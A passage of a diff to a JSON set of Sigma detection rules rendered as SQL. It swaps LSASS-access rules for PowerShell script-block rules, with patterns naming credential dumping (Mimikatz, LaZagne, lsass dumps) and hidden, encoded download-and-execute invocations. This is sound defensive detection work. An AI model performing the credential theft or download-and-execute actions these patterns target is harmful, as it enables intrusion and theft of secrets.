'\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.reconnaissance", + "attack.discovery", "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.impact" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "status": "test", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": "test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1552.004" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" - ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" - }, - { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 